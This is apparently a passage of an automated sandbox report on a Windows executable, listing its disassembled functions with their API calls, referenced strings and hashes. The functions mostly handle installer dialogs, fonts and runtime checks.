                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: ItemMessageSend$Focus
                                                    • String ID:
                                                    • API String ID: 3946207451-0
                                                    • Opcode ID: 1e471e65c5e932c3fbaa041e028a1576c97294f49729507e83dc0406014e8c24
                                                    • Instruction ID: 58add207b7a832a0b19d04ddd9afc6e980f616e20da4de3cbc8bd0fe57919996
                                                    • Opcode Fuzzy Hash: 1e471e65c5e932c3fbaa041e028a1576c97294f49729507e83dc0406014e8c24
                                                    • Instruction Fuzzy Hash: A2F0E1716C0319BAEE312B92DD8AF86BE1ADB44B54F05C061BB086D0E1CAF2D4509AA4
                                                    APIs
                                                    • GetDC.USER32(?), ref: 00405CAF
                                                    • GetSystemMetrics.USER32(0000000B), ref: 00405CC8
                                                    • GetSystemMetrics.USER32(0000003D), ref: 00405CD1
                                                    • GetSystemMetrics.USER32(0000003E), ref: 00405CDA
                                                    • SelectObject.GDI32(00000000,00000850), ref: 00405CF6
                                                    • DrawTextW.USER32(00000000,?,000000FF,?,?), ref: 00405D0F
                                                    • SelectObject.GDI32(00000000,?), ref: 00405D36
                                                    • ReleaseDC.USER32(?,00000000), ref: 00405D43
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: MetricsSystem$ObjectSelect$DrawReleaseText
                                                    • String ID:
                                                    • API String ID: 2466489532-0
                                                    • Opcode ID: a6cbcb2b4305a1e99beec2c3e81f55fcb86c146ba4bf7f5a6670c92b7bd8dfcd
                                                    • Instruction ID: 785a51681e43107f2c62d15ba462b8ada5e6743f05e8fc22807d422f271eaa02
                                                    • Opcode Fuzzy Hash: a6cbcb2b4305a1e99beec2c3e81f55fcb86c146ba4bf7f5a6670c92b7bd8dfcd
                                                    • Instruction Fuzzy Hash: 4C211072A40615AFDB10DFA9DC8898BBBE8FF08360B11C96AF559D7260D374E940CF54
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,00418575,00417C22), ref: 0041858C
                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0041859A
                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 004185B3
                                                    • SetLastError.KERNEL32(00000000,?,00418575,00417C22), ref: 00418605
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastValue___vcrt_
                                                    • String ID:
                                                    • API String ID: 3852720340-0
                                                    • Opcode ID: 6fa56343ef3f16540fef6699b2d9e3dc6e7216b42e9f8f51ca78fff69c3e7a73
                                                    • Instruction ID: ac70ee8bf5154da606db5642e10ef6a9fc2f3aee959224bcbbf31b09b368fc5b
                                                    • Opcode Fuzzy Hash: 6fa56343ef3f16540fef6699b2d9e3dc6e7216b42e9f8f51ca78fff69c3e7a73
                                                    • Instruction Fuzzy Hash: 9D01D4327193126EE634667A7C959D76B96EB627B8720023FF825401F1FF294C82558C
                                                    APIs
                                                      • Part of subcall function 00403744: lstrlenW.KERNEL32(?,00000001,00000000,?,004025AA,?,?,?,004018D8,?,hidcon,00000000,?,?,?,?), ref: 0040374C
                                                      • Part of subcall function 00403744: lstrlenW.KERNEL32(?,?,004025AA,?,?,?,004018D8,?,hidcon,00000000,?,?,?,?), ref: 00403758
                                                      • Part of subcall function 00403744: _wcsnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,004025AA,?,?,?,004018D8,?,hidcon,00000000,?,?,?,?), ref: 00403767
                                                    • _wtol.API-MS-WIN-CRT-CONVERT-L1-1-0(005FE3BE,?,00421598,00000001,00405190), ref: 0040166A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: lstrlen$_wcsnicmp_wtol
                                                    • String ID: GUIFlags$GUIMode$MiscFlags$OverwriteMode$SelfDelete
                                                    • API String ID: 24125944-3877767935
                                                    • Opcode ID: 0337f66dd63acc117d86530b97949966e35fba64d3a2841f5e9750379575d787
                                                    • Instruction ID: 1fefc3df929e48733e6ddbdade91eb5c6800b64d0e17ea6f62d14764a6b62cb0
                                                    • Opcode Fuzzy Hash: 0337f66dd63acc117d86530b97949966e35fba64d3a2841f5e9750379575d787
                                                    • Instruction Fuzzy Hash: 4D51AE21644312ABD634A6569CA067773DC9751764B78883FF483BB1F0E7BEC8C2921D
                                                    APIs
                                                    • _ValidateLocalCookies.LIBCMT ref: 0041A07B
                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0041A083
                                                    • _ValidateLocalCookies.LIBCMT ref: 0041A111
                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 0041A13C
                                                    • _ValidateLocalCookies.LIBCMT ref: 0041A191
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                    • String ID: csm
                                                    • API String ID: 1170836740-1018135373
                                                    • Opcode ID: 5e367eccd78a3872dda8812ee7a2a23bc053c39b26a0d8402ce192e78fa8da46
                                                    • Instruction ID: 01afc47be6d3f144b50ad0a053c1f62df44e2d75cf478d3931296b200fca9e1b
                                                    • Opcode Fuzzy Hash: 5e367eccd78a3872dda8812ee7a2a23bc053c39b26a0d8402ce192e78fa8da46
                                                    • Instruction Fuzzy Hash: D141D834A01208ABCF10DF69C844ADFBBB5BF44328F14815BEC159B352D739D9A5CB9A
                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040708F
                                                    • GetDlgItem.USER32(?,000004B8), ref: 004070AD
                                                    • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 004070B8
                                                    • wsprintfW.USER32 ref: 004070D6
                                                    • GetDlgItem.USER32(?,000004B5), ref: 004070F4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: Item$MessageSendUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                                    • String ID: %d%%
                                                    • API String ID: 3151147563-1518462796
                                                    • Opcode ID: 9c7d150db5aca2ccf60d2e64cbfeead02c927d258a63e72dc630f0809d078dcc
                                                    • Instruction ID: 45b03464c2a1215cb0754d0bb0fd224668146db83d2290658149ed07c9b23932
                                                    • Opcode Fuzzy Hash: 9c7d150db5aca2ccf60d2e64cbfeead02c927d258a63e72dc630f0809d078dcc
                                                    • Instruction Fuzzy Hash: AA31B471A00204BFDB01EBA5DC86EEE73B9EB48744F00447AF601762E1DB79BE118759
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: _memcmp
                                                    • String ID:
                                                    • API String ID: 2931989736-0
                                                    • Opcode ID: 9a34e416c6d01be04e4d389371424d3d9bd6ecd578c4bd22d66e4d3a50754ddc
                                                    • Instruction ID: ef3433f4d3ef313e7e3bfcab394600dd2037127a29c20f0efe927f51a72f2482
                                                    • Opcode Fuzzy Hash: 9a34e416c6d01be04e4d389371424d3d9bd6ecd578c4bd22d66e4d3a50754ddc
                                                    • Instruction Fuzzy Hash: A52196B1A0060EA7D714AA11DC42FE7735D9E61358B144137FC16AA242F238DF8A86D9
                                                    APIs
                                                    • _ValidateScopeTableHandlers.LIBCMT ref: 00419890
                                                    • __FindPESection.LIBCMT ref: 004198AA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: FindHandlersScopeSectionTableValidate
                                                    • String ID:
                                                    • API String ID: 876702719-0
                                                    • Opcode ID: e9cfddb422d051c3b26c839b4d7996d2eaded1cc3d2d9dc8930febb3ecd9b480
                                                    • Instruction ID: 0f41870931d5904cea21ba34ee88dc18a7d4276d4147a185d6bf4a9c9742233d
                                                    • Opcode Fuzzy Hash: e9cfddb422d051c3b26c839b4d7996d2eaded1cc3d2d9dc8930febb3ecd9b480
                                                    • Instruction Fuzzy Hash: D4A1B1B1A002158FDB24CF58D9A07EEB7A4FF45750F18422BD815A7391D739ED81CB98
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: _memcmp
                                                    • String ID:
                                                    • API String ID: 2931989736-0
                                                    • Opcode ID: 755d6d7f784d41f9d0f56c91fe5a0e06227a2ae012f9774440b6a7981359c4ce
                                                    • Instruction ID: 20cb65895c826b56d1a94ccbeb3a35201986642efdbee324d13c0b9210626774
                                                    • Opcode Fuzzy Hash: 755d6d7f784d41f9d0f56c91fe5a0e06227a2ae012f9774440b6a7981359c4ce
                                                    • Instruction Fuzzy Hash: C121A4B1A0020ABBD7046B11DC46FEB735D9EB1388B144127FC159A201E328DEC586DD
                                                    APIs
                                                    • SHBrowseForFolderW.SHELL32(?), ref: 004058E7
                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00405904
                                                    • SHGetMalloc.SHELL32(00000000), ref: 0040592E
                                                      • Part of subcall function 00406FA9: GetDlgItem.USER32(?,000004B6), ref: 00406FBD
                                                      • Part of subcall function 00406FA9: SetFocus.USER32(00000000,?,00000000,?,00405926,?), ref: 00406FC0
                                                      • Part of subcall function 00406FA9: GetDlgItem.USER32(?,000004B6), ref: 00406FD0
                                                      • Part of subcall function 00406FA9: GetDlgItem.USER32(?,000004B6), ref: 00406FE8
                                                      • Part of subcall function 00406FA9: SendMessageW.USER32(00000000,000000B1,0000002E,0000002E), ref: 00406FF2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: Item$BrowseFocusFolderFromListMallocMessagePathSend
                                                    • String ID: ;a$A
                                                    • API String ID: 3792050300-2582615566
                                                    • Opcode ID: 7efb4b2723e932306cd541c44e8648dae83d9c9574a8583efd3a6c56a4c5a57b
                                                    • Instruction ID: b0b31721cd8c0189f0528663253ad488fc03ccd8e1ca586dc21598c34889cee9
                                                    • Opcode Fuzzy Hash: 7efb4b2723e932306cd541c44e8648dae83d9c9574a8583efd3a6c56a4c5a57b
                                                    • Instruction Fuzzy Hash: 33112B75A11215ABDB10DBA5D988BDE77A8AF44314F1001AAE406E7280DB38DE04CE69
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(uxtheme,?,0040646A,000004B1,00000000,?,?,?,?,000004B4,00000000,000004B3,00000000,?,00000000), ref: 00405EE4
                                                    • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00405EF5
                                                    • GetWindow.USER32(?,00000005), ref: 00405F18
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProcWindow
                                                    • String ID: SetWindowTheme$uxtheme
                                                    • API String ID: 1082215438-1369271589
                                                    • Opcode ID: 9511b62c2303d872ebfb60c4b5267cb138e73ad263504c50661232451f17aa29
                                                    • Instruction ID: 0b2212db0201ca8ca1f2c524a03070d00ecb2aaf5b67f8b997d7619c4319ddac
                                                    • Opcode Fuzzy Hash: 9511b62c2303d872ebfb60c4b5267cb138e73ad263504c50661232451f17aa29
                                                    • Instruction Fuzzy Hash: E7E092316C4A2272C63123256C4DFDB2D59CB85B517164037F910B62C1DBBCC8418E9C
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: _memcmp
                                                    • String ID:
                                                    • API String ID: 2931989736-0
                                                    • Opcode ID: b67462ceb501a52f5732ad0ca6f62dbadbc4bb69b2ef33b926461c9adb50a524
                                                    • Instruction ID: 000c9580e2e9c01a743a6380ceb9dcf40b112b1a4b9ff7dab20a78686c8967f6
                                                    • Opcode Fuzzy Hash: b67462ceb501a52f5732ad0ca6f62dbadbc4bb69b2ef33b926461c9adb50a524
                                                    • Instruction Fuzzy Hash: E9119B7164060EBBE7045611CC82FEBB35CAF61388B148137FC15AA651E33CDE8646DD
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: _memcmp
                                                    • String ID:
                                                    • API String ID: 2931989736-0
                                                    • Opcode ID: 245b298a78602dd961001b5a290a7a2e175681dfe6c9ea360cda123e2a1e23ea
                                                    • Instruction ID: 505f67fccf6a5708d7b923504a75a841fcdfc1dbb003a3aaa0af8f45a1e9c664
                                                    • Opcode Fuzzy Hash: 245b298a78602dd961001b5a290a7a2e175681dfe6c9ea360cda123e2a1e23ea
                                                    • Instruction Fuzzy Hash: 8411B2B1A0420ABBD7046B11DC42FEB735CAF61348B148127FD199A252F228EEC586DD
                                                    APIs
                                                    • GetDlgItem.USER32(?,000004B6), ref: 00406FBD
                                                    • SetFocus.USER32(00000000,?,00000000,?,00405926,?), ref: 00406FC0
                                                    • GetDlgItem.USER32(?,000004B6), ref: 00406FD0
                                                      • Part of subcall function 00407164: SetWindowTextW.USER32(&Y@,?), ref: 0040716D
                                                    • GetDlgItem.USER32(?,000004B6), ref: 00406FE8
                                                    • SendMessageW.USER32(00000000,000000B1,0000002E,0000002E), ref: 00406FF2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: Item$FocusMessageSendTextWindow
                                                    • String ID:
                                                    • API String ID: 3590784419-0
                                                    • Opcode ID: ee964965f1595af0bd655cf5e96c1a507a195f0db555e4b92506279391280dfe
                                                    • Instruction ID: f6e1cc8c7d00fb96aab07a802bf3c83ba1f2c87e2675e49942b041080251666e
                                                    • Opcode Fuzzy Hash: ee964965f1595af0bd655cf5e96c1a507a195f0db555e4b92506279391280dfe
                                                    • Instruction Fuzzy Hash: D5E03071A41210BBCB206BA69D89D877F1DDF853A170580B5FA09AA171C7788800DAA4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: SetEnvironment
                                                    • API String ID: 0-360490078
                                                    • Opcode ID: 0ea6591de479892366c2af27a04e983d93b3bc9cdc0b1c79ae3bd1ec7d4782a5
                                                    • Instruction ID: f844d74c5fc4ce8d264c4d2ff15d3e98a65cece2ee36b5efcc8bde039da5b95a
                                                    • Opcode Fuzzy Hash: 0ea6591de479892366c2af27a04e983d93b3bc9cdc0b1c79ae3bd1ec7d4782a5
                                                    • Instruction Fuzzy Hash: 2481E231C00248AACF01EF95DC85AEDBF79AF15319F14407BE4017B2D2DB395A529B59
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d7ee4985423cf96dede614f1951a7e9e3b1a385ff82cb90654be050e6cab35e8
                                                    • Instruction ID: 3a1d156a642567a22983ba9909a2241f94cd9ca45c0d99c448d6f3703fd47455
                                                    • Opcode Fuzzy Hash: d7ee4985423cf96dede614f1951a7e9e3b1a385ff82cb90654be050e6cab35e8
                                                    • Instruction Fuzzy Hash: 1A312775604108AFDB04DF44D981EA97BB5EF08354F14809AFD198F362D735EE90CB99
                                                    APIs
                                                      • Part of subcall function 00405F99: GetDlgItem.USER32(?,?), ref: 00405FA5
                                                      • Part of subcall function 0040744D: GetDlgItem.USER32(?,?), ref: 0040745C
                                                      • Part of subcall function 0040744D: ShowWindow.USER32(00000000,?,?,0040645A,000004B1,00000000,?,?,?,?,000004B4,00000000,000004B3,00000000,?,00000000), ref: 00407474
                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004066C4
                                                    • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 004066E0
                                                    • GetDlgItem.USER32(?,000004B7), ref: 004066F3
                                                    • SetWindowLongW.USER32(00000000,000000FC,Function_00005953), ref: 00406701
                                                      • Part of subcall function 004061CD: GetModuleHandleW.KERNEL32(00000000,00000065), ref: 004061F0
                                                      • Part of subcall function 004061CD: LoadIconW.USER32(00000000), ref: 004061F7
                                                      • Part of subcall function 004061CD: GetSystemMetrics.USER32(00000032), ref: 00406209
                                                      • Part of subcall function 004061CD: GetSystemMetrics.USER32(00000031), ref: 0040620E
                                                      • Part of subcall function 004061CD: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000), ref: 00406217
                                                      • Part of subcall function 004061CD: LoadImageW.USER32(00000000), ref: 0040621E
                                                      • Part of subcall function 004061CD: SendMessageW.USER32(?,00000080,00000001,00000000), ref: 0040623C
                                                      • Part of subcall function 004061CD: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00406249
                                                      • Part of subcall function 004061CD: GetDlgItem.USER32(?,000004B2), ref: 00406265
                                                      • Part of subcall function 004061CD: GetDlgItem.USER32(?,000004B2), ref: 00406271
                                                      • Part of subcall function 004061CD: GetWindowLongW.USER32(00000000,000000F0), ref: 00406278
                                                      • Part of subcall function 004061CD: SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0040628D
                                                      • Part of subcall function 004061CD: GetDlgItem.USER32(?,000004B5), ref: 0040629A
                                                      • Part of subcall function 004061CD: GetDlgItem.USER32(?,000004B5), ref: 004062AA
                                                      • Part of subcall function 004061CD: GetWindowLongW.USER32(00000000,000000F0), ref: 004062B5
                                                      • Part of subcall function 004061CD: SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004062C4
                                                      • Part of subcall function 004061CD: GetDlgItem.USER32(?,000004B2), ref: 004062DA
                                                      • Part of subcall function 00406FA9: GetDlgItem.USER32(?,000004B6), ref: 00406FBD
                                                      • Part of subcall function 00406FA9: SetFocus.USER32(00000000,?,00000000,?,00405926,?), ref: 00406FC0
                                                      • Part of subcall function 00406FA9: GetDlgItem.USER32(?,000004B6), ref: 00406FD0
                                                      • Part of subcall function 00406FA9: GetDlgItem.USER32(?,000004B6), ref: 00406FE8
                                                      • Part of subcall function 00406FA9: SendMessageW.USER32(00000000,000000B1,0000002E,0000002E), ref: 00406FF2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd
                                                    Similarity
                                                    • API ID: Item$Window$Long$MessageSendSystem$HandleLoadMetricsModule$DirectoryFileFocusIconImageInfoShow
                                                    • String ID:
                                                    • API String ID: 2966018739-0
                                                    • Opcode ID: 57897be0ac03c02ee836a2b470a9b7fc3d26ce4f1537270b2cc153723aa7b8e7
                                                    • Instruction ID: 720076208a8cd8d4a611c5ecdbd6fac6abd83f3f904a645ecfe44336e6d10c83
                                                    • Opcode Fuzzy Hash: 57897be0ac03c02ee836a2b470a9b7fc3d26ce4f1537270b2cc153723aa7b8e7
                                                    • Instruction Fuzzy Hash: A21193B2E40315BBDB10ABA5EC49FDEB7ADEF44318F004476B605E32C1D6B8D9448B94
                                                    APIs
                                                    • SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 00405D7D
                                                    • GetSystemMetrics.USER32(00000031), ref: 00405DA3
                                                    • CreateFontIndirectW.GDI32(?), ref: 00405DB3
                                                    • DeleteObject.GDI32(00000000), ref: 00405DDF
                                                    Memory Dump Source
